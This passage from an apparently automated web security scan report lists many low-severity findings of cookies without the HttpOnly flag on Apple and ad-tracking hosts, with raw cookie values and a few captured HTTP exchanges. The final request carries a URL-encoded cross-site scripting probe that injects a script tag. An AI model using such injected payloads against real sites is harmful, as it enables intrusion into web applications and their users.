ccl=TNR6wRKxYNtzCvSt8e6STR2MqvPvXtpaAgpVqin1Mrk8o+RAX/5mnxfg6ECcROU0uWvpVhMwRgqoY73TaZMS/97b9MnofN0e6hxKOjj84BlV3c79hXWOqUiufCmyOYi7f7qAwdsMjWlA3o0ftcmYcgLz3mc5+tUS1U0SwSrb74xJN/zjHSefbTj0YUDfnOgpnsit8uGMe0qMqRzPmoKqnog9QlgcAKOknndO7TRbN9xMFXxd0OIAsSGJeWZvVdOnWIItMSHHJfq2FWKvVndmcrwXp0Ydz17trZmFToSJMW9eItyrLnehzC08teaShi7psyW8Y59sdfm+eGns1sZEbe7IVI170VNgreznAk7Q3sN9Whg6TEGsreK942FxqPFitCSjJOW4uy3Q/mFvjc+JJGezduu1ZXS8gEwlynuFQ760a3YeGUOK1qPkkKK87YG3BqSDyhqht27HYsgvl+x6NXp/TdrrT2KxVwWmtmdMAz+XS6rag4PmTuJXo1EHG+02z7guaChTesanQfPFdKqlSBRccsJLvIwkdAUp4WzE5hwFttYocu6YTP06Gydhe6zY; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.129. http://images.apple.com/support/scripts/AppleCareWeb/Modules/ExpressLane.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/support/scripts/AppleCareWeb/Modules/ExpressLane.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=eBVbIuZddax5/P3IomgWyldw+SNwA80QbPxxZC0jXp5XG2GgBGnQ1zoUpnVSRleUPRAtLBuayMkgZ+hruSg5Yx+bZsDhTRi51J9sQTs+pD51G0pI8vqliot+VI5No+QqQHZxAIdpEWoOv7nilIRsfBiKQ1Er9RXvCnBRJKxlsODtEzNkyr3JPTy7Tw3aDaywAFFQwR0zSNYtNOd/u40BdSN/t3u0kQvs/ZOJBl8uYiaXjU/cREV7qBSnJ+DfojsYTfF1iMX47mmLH9eK7slyHBbV+zjYPgnFIPq/wQ7gq9QvIOdtE0/nAnKnqsyDta97lxEAALu813TmRdKWRpMLXV0uaa0NsbpBl+mbcOuIkY2C27NEj3UsaiW9GsYmaSfMR5WmArz0+/BWo5xY+37q3+UWTRDqEHRFUgj/MBzWWD9mVaHheGMyYBbhxu5HdtUgWkLMx1eyTKf5mnYfqN682909rF+vSYzByk5hKtSvVc8xLL4Rf3jaNEzTdlifyFPsv2qUxaS2ZKJph86yHIea/nLQmx6Prw/zkIfnX2L2Y00F1NGoek/FiKx+Kchn8rev; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.130. http://images.apple.com/support/scripts/SCReporting.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/support/scripts/SCReporting.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=vieAF8ua3wYA4629WNHOQPzNpLpwVOGsNUO/b2NkvqijTQ2cH+ZC0bfCIJrNcFlW8g+LdVVmUhG8woi3I1iWooPfRZfVnnZHNWc5G7UJhHTnMIFZDUK4bwYy3BCaGYTarC0WWNNAtACV1t8Unx/+VZ3QTHuS2yGrllrOxrYsY8C26d6Ll0C+13apl9kw/WCuct7zr/ZrEJpy90HexZYyOWrNJ4/irxFXKFsl87CE0guKPrG6wSnD/2zjQr3HUQGBmMexb02DPUqxoYmH1xCxZfZEkdZVbRMTx9JvyNZ5+j8a9lOh+mj2OAgRN/5DHSlgEWzmza0xEFlgtw9EmREG+2LTtlaalrRm7x1IlmyFUK56VST+OlsrtC25QQocg6lgE4bLW7/oTXoMYRSNZHpHtZdz8/q7xGk4R5XzCcyjnjYP0Zo0KxVWXlhKcVB+9s9xcmodJZtqCFo97e5mr6brQ2UR+y+24k9nqL0At4Nj6U6Er9BL5NENo0d6jKMazgYDCP4y83PZn6MqpB4qeVwXp7QV08dzNOl8iv48KroBlV3p9igW0zZO4XhCuMyMeP2G; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.131. http://images.apple.com/support/scripts/module_decorator.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/support/scripts/module_decorator.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=Wo0u1ZUBlL/aYW9rbxsmQbKE0DRicGsLE9iJgbiunfgOMquJz4iqwXRDuVSvojoGR8zGgfHOElcgTO7x1KZixcXDW8l76BYDwNXz8ePTzrf95uaRtHpSdtdkG5MOQ28Tyad12GBQA7NEbMPVJSuJyPu4mtIsYmLrMvnO5suIskc3518FxTkJZozJZSd05HOvoWfrRYerKLx77h983L6uzhQ4n4WBn5mYhwafiZ/chmQFkNkaJNxXs2sq5OlfekRPR4HP8YoPd1kSjEM+32AfpP6p6hOmXk8O/jNJaTPvPBN5EjMRArwrVDW/N2MQz4dJukN2WxJ1Dm/v0K9DwxwjrjUDw/qdkaKF2I5HTkitEx5jhmjYizB9Rwk9/3vcvFroTLxILt0hoPkdwY7jcaQY9gOmbhI0CGY2DALQZbMIhEbSsmRrE4j5NEQsAtVSrPG+B3pph4gopSS24VcPXkJqkf4HBDkwAvlaC28l7a00uUnknicxWeQzN5LmIdQnJ3YjwhO58sUXGufnIp1915jHk8rg7vIC/lZ/6Q9I/9rXFaLmhd1pn0OgIGr7pys0W1eF; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.132. http://images.apple.com/support/scripts/new_country.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/support/scripts/new_country.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=w4CXT8701a3+jEFsYEy5UUZgzr1bz8Q1S/6GEWWauQ+UuojsHwdRdh8Rh3BiOtlF69bB4dLbDvDXtx3hgjzqhsxH1G7KbQ2QeTtJRXXMtzKdtMGeY2wifVb1RGKkiid9dGve56cj5ixdcLUC6uLiDUNvquCh5Pw7WuLW38n6W8wM/P0L/bKxXDNf/tZobRHDXsl+39dY/DHPbbhSKZK3AMn103V8RV+piUgvsuwUd57tLm0HO2ddf5mtMSyZwCSPe33Yw1QxIu18bQwBHVFFLTtY3G7kwKLbf+GCOM8zoUh6vPGVRkKsnvo8qGrKyMBIdDlklwgbhLRJEOdBXBmcFmboZABBTZhtMfuQCFWVZOUmcePu+79d5UAKzWk5eUxkIOji+3U9aaaa8Vb8uTzKZJIkhFJgftTU46gG9wStWpTchmD8txswZJV3p1FjgrhFtW+Owrb20mYaXtVJN7U3KxuNpn4x97WkHzenwRwHkW+BHMbqNYUl5DzWYBtTgs7UhsoACvBoQ8BaREm04hHc7M737jMHauyYz1o8gGw3niKCuAPC3uhGcJmxqsWKTlpN; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.133. http://images.apple.com/support/scripts/new_support_coverage/cookies.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/support/scripts/new_support_coverage/cookies.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=EHAJMB4i5huvSr6bz+eU3pbNX0WmPYP0P+xUTLO2fDw/GlbtYuBHd5jVtRJsn1sMWECvnQ5RRX5q2HikAzmSoKU62TBznh6EjT8LspazqOHvr4AyVuD83EW7Pk0d+lgl409m5IoPbbGL1jwZnoDYm8U1D5WDL2vkedEyYJ0TbabcPjnrFhVyGDx0U58YxX0hySW9B5m0eSCx1x1qQ3KiU1D6Dzhkj39DkLHx5wDZXUJxbkCfjH5/fs5+YK94VhZCWD9CzKTvts9LXR2G9Voe64DY08yM7mm+hodw6B5bkqqpZHPtzv4c3tttImDC6AAGcL2MoXWtCrmdCwQsDVPOj6htB0QvjxmoqAlbM6gZORjPdM/rzJD+2UrMupyGOVepQro7EfPzcHYzm8o88Y5E91m+qO99fn5/G2RO/d9dvHGDUNx66X9sw5etgEyJzA9QEVkPhSini6gnahASZ76iV4oHaf6UDullU+0Oz0THZn/ch13d5uBai/FYRh2gOR4BhTTQqA1F1f/aukQCA/dvJkHOqwF6GwsKRIRcEc30I8zAc8B6an0Bd6fZe+EQE2kq; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.134. http://images.apple.com/support/scripts/new_support_coverage/en_strings.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/support/scripts/new_support_coverage/en_strings.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=hqMS67aZcBwzSNxAuY5Hk0XYDWPNJ00Y4pYVDDsH4lGDsWRRsLbnRdYW9ABwr+8VSIOa+TmOlSiu5BmKeYj+ihhliNdYwV62iLZ43KjAOyGkW4QuiTCOJdwKw4uFaPr4ca04EQ1Nh6+067IBn8lq6rja/lbosQrHOWtbQucJk15N4P04ojYWvMKlrswnNLkHu3JZ54f+YRC+sgKL3eqqLLh32Bapxe3c/vtaQBiKhnmlKyNtxXSIUffwql16ejUKRsWrYZ+eSJXDa21DsJubvUcuHqCVAMHjyEu6TQyPzQZ+HA9gL7M5N4NKFv9H0zUA/Rg6pl/eqY9bSA5ZasAwt6MuGJywDiB99Nfs5AVwsypm16LFE2WLgKR8bg9Xc1am8orBORfg5zPzUHzVhIhNfKepuioz+Vcm65x+MLfCMasoopzqs+egTdBSWLQWNm2uGLZGcZnBuSudiF4BqxO+ZNQ6dNXyI48RCK8GfSPkxZXhwXFPnjVTHgLqoyfS4RnmryVjFB/6r9Ouue7nTZRNEW3y79MhwsfcCa/0xpnqbgYEGz5RTySCAPHm5HS/rONF; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.135. http://images.apple.com/support/scripts/new_support_coverage/functions.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/support/scripts/new_support_coverage/functions.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=twgRe15waKQ+fWjMqczRsDWiVy2IVDyOYQS6FbRX/WA9uZ0cD5tNYIegQBFAe2dh5eCIZ8GE6cwJrO8C4J//cdD+/3RPipwrctTA90CbR5xoDwK6I0FYxdGP0DCDMaRLmpP+wObMUKLRX5MkVlZU7PzTcO0U5nQoegWDUwi6mwJtNg9yZMKk24osEMss2gmeM29HgTzWiOD1mg3kKbCqamqbWF5yqIQTFy1PHkGaLKuKMmxoCe+jZnzqX2KSjUVTHSJKGEiZs0HDLVlHvxRilspoPaQc7SO7Visbjd5NoZS0v9IqQY2pbG2l4UL1ioP34S+Kw4S1RY/2BfQOjC8FqMrPsNTiQrd1w24cv9xUxCHTBpUZiAkoMBQSGV0QpDwe7xsNogQvsgV6R1FxcOhn2XCa5jJGCpdXEzg5vPMgYVYkEwYT1IUNh7PniPDbNlpFnabXjM8ouNRYrfihzezhMF4//ixtVwosbWIsi9jXBgPuxjo1JtpPWYvf60XaMDQaGMKSezz/2tO5oPgbyctjYbtaby7+Z3+LoQjIQu4BmVP3lk9FLPzFlkR+NbhwUBCC; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.136. http://images.apple.com/support/scripts/psp_geos.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/support/scripts/psp_geos.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=Ood0UmYua7m+Bnf0Af5wUN/2a2kCEfR/1QN0it/sqGfB1br7sznssGFbJCD3hTynijYF+mHyFDZ8YnlUxxzu4E1U3KBRpVS8oBxjvGZAqKXZrsEDGQvfIBBw2l+mlkpqJsobbQOO3IJ3drYpoEZ5S/Y5m35u9vChxr3XGbnppaXDssy5OxFPwHbC5Q//bnzDah/Nf6QvK6F3Ho9ix4xbIEsV1O2gBhTQLE3AXMS8gRvrM9PE7A9DrmseyVpD9laz9ZA4X0+PecoVwsTWxmZRriOe7otssCZ13c72ZXJMgewJCvntdwb616lJ6319h1RIYLGblNHrUCCscW2Eb3Ifx8INhPjq8iH3g6p1ph08cAFHWUTi/DlXvKQSNAqqEVcnk7ZexorVoocj0vt4gynnPoD9/jR69ipNIUgHicV5jnEM1EP4NAJyLgWJIdaBhc4B+HbDWFB8FGNciwomYzKUmy5opghIS4ScR8DPVjt9Vw8OKfv8uG2w7qpPmYHq3Vhy862Ru6p6zqD+d+MzwEwGuZioDXVFzTvEzyslWJLJljAc0Y9+CoyT2624rSW5V6vK; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.137. http://images.apple.com/support/scripts/support.global.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/support/scripts/support.global.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=yTgR11uB+DBpVqfda/savR0QA9Ccb9tkGvOjAD1XXFLKNBkd/MS9W/NuQVHUBjvvgbR2X6oYongQtfm/Tgt9hD340c+/bDdyWNZI1twFEJ77mw64fa97rH94ZneaMG7ZxD4la+hTfowIo2At49rw0Q9VGG+lnyL3Fza6PCq6HhW1JjaHBAShpLJfRWXSkITCZnX/i9PbPxO88UrgR6XP6DDJyIac2rpqRthHoDt6LcfotY8iNhw5ne93S9R8FWp9ObZgerZvZxeIvSAgciZBsFpfs06OCKOT6+IDai69EmemWKD1IAxSgstgxBJJMDgxFICLmuBjuFdV0gIjBjtFx1pooD0IEj6QEIVvWXvdjt4lTpJeURGELOIlXQgUetagQOgdi2bSvDsi7gQPk2jUi5lNC8gsZjnay7gPB7U+9JtfnOlqoUwamqYLI7rDcGfEFWi3jtEVnLqf/ehMYGp4Y265KAsUbmTOv6Oq9+iVn1IC/iNC0zMAUEmJyACIatnEV9o6pjBCx91VHR9SZOzkb6PPc7sByfqCZvnkJE3TtbJFxpLZo8EWrMjmq6m+YyL5; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.138. http://images.apple.com/support/scripts/warranty_check/warrantykeys.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/support/scripts/warranty_check/warrantykeys.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=D2HEMlmlIvkvS2UQ595HdAZKNKAOTm19V1a4UqDpQKGf0BPXJKDHgQr4zLDURpL4BCjVosrDHcuv9MzXiKC1lgBC/1/f9EkaRc6XQf44NkG1dnzmNzwFKbHERsu7Io10ur07/6AHUo2Rvqk1qlcLyONyTRmvK5HZXi3S72TwMAXtI1NxNyXlgAZE6tgRSBrCkI/v38sAe46CVPnt7Z0jo4KFPmre5c9NqrUndmuv75ofaw7I8ZI/ZGbEg0JdozbAJOkGiZeqYn212jm1A9kCazKuIPid9gH45pWqGPICJ2jQl1fEIMpohN7N4hWd2tVD1WtErrg/+4ez9ycMZY2GfPCljzF+RRpgeISdiInAOUEeN7Y00hPNdDb+hQVxIkh9/7O+goMBd8Zf2/98efwRcljsuwxAwtWYlMF8jZg2TtGwnkmNotyseLIMyDqYWy4itmIK3k2ResHbmjvFM3kGI84pqxfPFpsP0JOjQd3hj1skZqK5HKdeqrI+RBZ85uMr+Lg6bJPwCN5gH9N40dZGCZOwfID0LQjue4uodZAgePzKDM8ovQa8f1mI3isFLBB/; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.139. http://images.apple.com/support/scripts/warranty_check/warrantypsp.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/support/scripts/warranty_check/warrantypsp.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=hrJbDtK5cMIRno7qhpE27Uu8DdtJxsnjXm6qSTj0aeUpzjcd0I4+2FnuAC3d+JIEEwDOyuElw0Tb3opnq6s7DreK1BQw3AkzbmR8Qg1QmuzQ+QGrSnxCuBNqLHd9fu2NoeREB7TbnSGOVdqon/CLrNTjM+IAa3ydfX1+u1UELIu/NrbOb4kBQSWI1fNACLohTJm0Z7bBQ6YAzBJraqCdSpYRTpT61itcBJu8hXz3PQ3pYJZUmCrCM/LKy6LXuhYZOMIiwqmhZALswFrWZ6in2+R4iyLQui/A/TwDpkQDKUrzGuYQOKbdyqHjNJDO8SmpFUYuLLYENWumc7z7gYTMv+4wmAUPyNoirTmMfGyQqcQB9iu7hswCR/G358qFt+YUobsbBDGAPnNSRVVVpwhhJmDbpEYN+sfAazLu5XruZal0/bythYQNNxboD4BMBrT0b0UMChIdnid3tqMFew05CAF/LWhV+tYtBLjZitV0tXsWQR5e+FQR9Rwnyebu439gCtwjTW/bflMCQ82OTi6cAPfztz1Z3nFoUEF0Ym3Ng/QJGy/omhL5iK/vMBuGapsQ; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.140. http://js.revsci.net/gateway/gw.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://js.revsci.net
Path:	/gateway/gw.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

udm_0=MLv3NyMJZgprXtsfwM3R13ELUehQKLWqEeq2jcz3bMW2EVsJYC1CZ2+KufzdtNqTUsG61ynJgNGyDJUicH3u/6ljL39LDRj/OkdDI8RQ+vEeJTeb16lFNOrVt5urjQKwEC1SnZtOgKyergmUb1M45HYA78FqX6kI/SSuxNe8cK8rOVxL7GUsDLJQQxVJ61ucx5N8kZ7yrrMY9iMiwKUurZXsTekGG1pAyPzKkjGr9Gz+FLZve5SRGk+7Ao6LwY8+ncBw1EPbKy5StP1u6WoiUrlATwV9pU3L1IQgYez9T2WCUeFZzOxUTn+2uxsf5QG2wWCVI+a/JbER7jhwsgi7SMWl3VgRo4RG/5dtFrYUmvx79jJjD/w8pKmn6U0SrxZ8+/SASGLmfMFcVJYqLZRlAvX766EI+xMdKMfzQcTvT0jWfK+c+Af/jCcLVgisOGx6mhCAhpWBsqoNp+73eW/3jjEYc7NTm3/tzGTD7qa4JdcviAz6Ee/li873EJi0sfvagTpNmJ9vUKaIZ4Ru1l0qWolq9WAf90Zd/tgKm+mfoKoGCPRbl52Hu2ctJHpZ7M54K6DdzC/WoO9oiDNC2qzIizs8ZH7iIPUlp9Ym/AFnwgjGBXyJsUQ1IXA2hOqmzjwEBRxbzH3xN/HxYabMVhoa4LLYMShXPOkSSMuNsWzEe1dMZ+69z3YN/6ya++WcdBW+7Y80eA7NpXSg+RsfUuM3Res+qHQzQrvs0uYPUc9oxK0nZqUfYCpXNhy++JAoeY65zxBdJctZMl7YNo1/opy1Ist4JXlu5zqHcc4/II37RsDGyOHIKs9kj5V/duTnLLUt2tYAF+ESGJuEGU5zbdo0DdXKGGXDIKvfiAWYGhpRV59vTdqoBvqv0KGnMw/Vf8ibIdjpYIck1cl+Dnok7yzclasssHnMgS1VFq72m72T1cXsZDOtJa1D9aFfLWm1j7JGdoeIIumIBSOP3FE8ForcZs/dqtIwwH6rlSb7XR/oRNEUE3yZEU5g8LDVBXtTQecbSTMZyNbHifc1dsuVH+NxSUOA8ScEThuEXYJeylt+jOhqEOVKTArJMbOkUEO6Y9k3KufLSADtjGx5/QuieaRdKXjZGUsuUT82VssmqXw/d/xO11UQvzYj1puc9n28ao2QSKyb60f0Kn0QeHbvxP2vLzX3juZZ6Bbzmtg/GFKBNv06HGA8rSr17pVh7/z8WINsdOLvWLPUH8Hgybk1cnw5v044Zu78fasOJrwfeezV+U2jACL6Uim30EtGIxi2XgvFnOaMdrk5SzHLJ0SWYgwUcmXSWStKqbgFxCQJ54ZVOw3vbjcYeaTsKNd3tnQe9PCexkabFDgwzKkf8T51usFPtjmrPqPU8I+0nocyEf4EqOnOa/ZHcu/SYRp5KwKsejooQA8qvQ6MtXYvQwhvdOoWFRknUOq86bo5PgroDMDW5iaxQeIZ1kUeKoj91JMKiZIBQMjIY2A1EYBO00CUJl/A50fAaxLyQehUCBQZaYSZybq5sNDMowJjAJ1Pj4XtML3UJsL2ulLZ835wOONrP8FRpM5P+bxZAq5D/5PqkqzG8ZiJuciJeZij9+n3R6scTzElicbAlK+WUoDJPpLvQHM2IZPKNTKqeyk83wblel/QculOCoV2rwDl+OXsTAX7exCQOsskScP4B2lPYGMyNTs3OX5g3wII/O3qF0XSmGfECzd+FrxEBiB+Q2PB1nzo4LJzXhwHKvkIgnEnh4hdIQyl8PAVpRTybX7JAshdBwKaDDEb4sUVtdjwGVHVIgqcddax+1w=; Domain=.revsci.net; Expires=Sun, 22-Jul-2012 04:30:59 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.141. http://leadback.advertising.com/adcedge/lb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://leadback.advertising.com
Path:	/adcedge/lb

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=uUdKOFriDs7mGTukCfASbXUqH0t1Fl6B8opRpeAtZaUqHwa4Fl6BkFeRpewSaaUqHUlmGl6BYGeRpeAghXUqH0NYGl6BYimRpeA3WaUqHIcgGl6BjKrRpeQwBaUqHcbgGl6B25lRpegsZaUqHE1lGl6BecpRpeARXaUqHcxvGl6BY8rRpeQjWaUqHYxvGl6BKopRpeQRgaUqHI0rGl6BNppRpeQ2kXUqHQTnGlakBwl5IaIeNSvB73cRYYrxIUOuGAnreEAL/ZIfGeLJrAaxR0qyFcydGN6sEXwQpacpx2TBrTpxcD7+Gg5kGNC; domain=advertising.com; expires=Sun, 21-Jul-2013 19:53:18 GMT; path=/
GUID=MTMxMTM2NDM5ODsxOjE2dDUxa28wOTRrMGt1OjM2NQ; domain=advertising.com; expires=Sun, 21-Jul-2013 19:53:18 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.142. http://legolas.nexac.com/lgalt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://legolas.nexac.com
Path:	/lgalt

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

lgtix=SQACAAgB; path=/; expires=Tue, 22 Jul 2014 13:48:49 GMT; domain=.legolas-media.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lgalt?ci=7&ti=73&sti=53&sei=21&sci=2&ai=0&mi=0&pbi=0&sts=1311428799901168&sui=8f8ac3d5-2ce2-4258-bdfe-d1053ae341c4 HTTP/1.1
Host: legolas.nexac.com
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_id=2011051519270862126421219180; na_ps=3; OAX=rcHW803foR4AB3jk; na_tc=Y

Response

HTTP/1.1 302 Found
Date: Sat, 23 Jul 2011 13:48:49 GMT
Server: Apache
Expires: -1
Cache-Control: no-cache; no-store
Content-Type: text/html; charset=iso-8859-1
Location: http://r.nexac.com/e/getdata.xgi?na_id=2011051519270862126421219180&dt=br&pkey=mxpq23ivacz82&ru=http://rt.legolas-media.com/lgrt?ci=1%26ti=74%26vi=7%26sti=53%26sei=21%26sci=2%26sai=0%26smi=0%26spbi=0%26sts=1311428799901168%26ui=8f8ac3d5-2ce2-4258-bdfe-d1053ae341c4%26na_id=<na_id>%26na_mp=<na_mp>%26na_da=<na_da>
Set-Cookie: lgtix=SQACAAgB; path=/; expires=Tue, 22 Jul 2014 13:48:49 GMT; domain=.legolas-media.com
P3P: policyref="http://www.legolas-media.com/w3c/p3p.xml",CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Length: 526
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://r.nexac.com/e/getdata.xgi?na_id=20110515
...[SNIP]...

11.143. http://lifescript.us.intellitxt.com/intellitxt/front.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifescript.us.intellitxt.com
Path:	/intellitxt/front.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

VM_USR="AKdo0GgCJUYDq4t2/GN0I5MAADtIAAA7hAIAAAExTiWzMgA-"; Version=1; Domain=.intellitxt.com; Max-Age=5184000; Expires=Mon, 19-Sep-2011 19:21:58 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.144. http://lm.trafficmp.com/clicksense/epic previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lm.trafficmp.com
Path:	/clicksense/epic

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

T_kuyx=21971%3Acvq%3A1; Domain=trafficmp.com; Expires=Fri, 20-Jul-2012 18:01:16 GMT; Path=/
2=35BqvhzfiVY; Domain=.trafficmp.com; Expires=Fri, 20-Jul-2012 18:01:16 GMT; Path=/
AP_OTA4MzY0XzMwMHgyNTA=CNeb7-6UJhDLy9G-3fn2pjEYiv43IGwoyAEwADoDqO4F; Domain=.trafficmp.com; Expires=Thu, 21-Jul-2011 18:01:21 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.145. http://load.exelator.com/load/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://load.exelator.com
Path:	/load/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TFF=eJxLtLKwqi62MjSyUjI0MHEwNjZwsLS0NFKyTrQysqrOtDK0BmIzM2MgZQBj1mKoNwSpN0ZTb2QN4SLrM4drI04HkDYwwaES3U1As1MjUnMSS1JxmY3LF0aGpPkaqh6nr42w%252BxqojTgdtQAPgWet; expires=Fri, 18-Nov-2011 18:43:40 GMT; path=/; domain=.exelator.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.146. http://m.webtrends.com/dcsjwb9vb00000c932fd0rjc7_5p3t%20/dcs.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://m.webtrends.com
Path:	/dcsjwb9vb00000c932fd0rjc7_5p3t%20/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zNDA5ODgzMTg0LjMwMTY0NzQ2AAAAAAADAAAACgAAAGdjKE5nYyhO8gEAALNNJ06zTSdOWgAAACpUJ07XUidOAgAAABMAAABnYyhOZ2MoTjcAAAAqVCdO11InTgAAAAA-; path=/; expires=Sun, 18-Jul-2021 17:35:35 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcsjwb9vb00000c932fd0rjc7_5p3t%20/dcs.gif?&dcsdat=1311269739342&dcssip=www.microsoft.com&dcsuri=/en-us/security_essentials/default.aspx&dcsqry=?bladeFlyout=Share%26f9857%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E256ae1bee6f=1&dcsref=http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue&WT.co_f=173.193.214.243-3409883184.30164746&WT.vtid=173.193.214.243-3409883184.30164746&WT.vtvs=1311269739330&WT.tz=-5&WT.bh=12&WT.ul=en-US&WT.cd=24&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Virus%2C%20Spyware%20%26%20Malware%20Protection%20%7C%20Microsoft%20Security%20Essentials&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1039x733&WT.fv=Not%20enabled&WT.slv=Not%20enabled&WT.le=UTF-8&WT.tv=8.6.2&WT.dl=0&WT.ssl=0&WT.es=www.microsoft.com%2Fen-us%2Fsecurity_essentials%2Fdefault.aspx&WT.sli=Not%20Installed&WT.z_locale=en-us&WT.dcsvid=7d82853ea5283f499a9e3add3769434b&WT.z_anonid=AxUFAAAAAADHCAAAdQ%2BMX09BAsRu9umGsxl6kw!!&WT.z_MUID=1FDD375D440B439987A467BECD35D2C6&WT.vt_f_tlh=1311269739&WT.z_Initial=0&WT.z_ea_name=One-click%20download&WT.z_ea_actionoffer=Download-Product&wtEvtSrc=www.microsoft.com%2Fen-us%2Fsecurity_essentials%2Fdefault.aspx&wtDrillDir=%2Fen-us%2F%3B%2Fen-us%2Fsecurity_essentials%2F&wt_linkId=40-00-111SXX02972%3B40-00-111SXX02975%3B40-00-111SXX02976%3B40-00-111SXX02974&WT.dep=wtEvtSrc%3BwtDrillDir%3Bwt_linkId HTTP/1.1
Host: m.webtrends.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
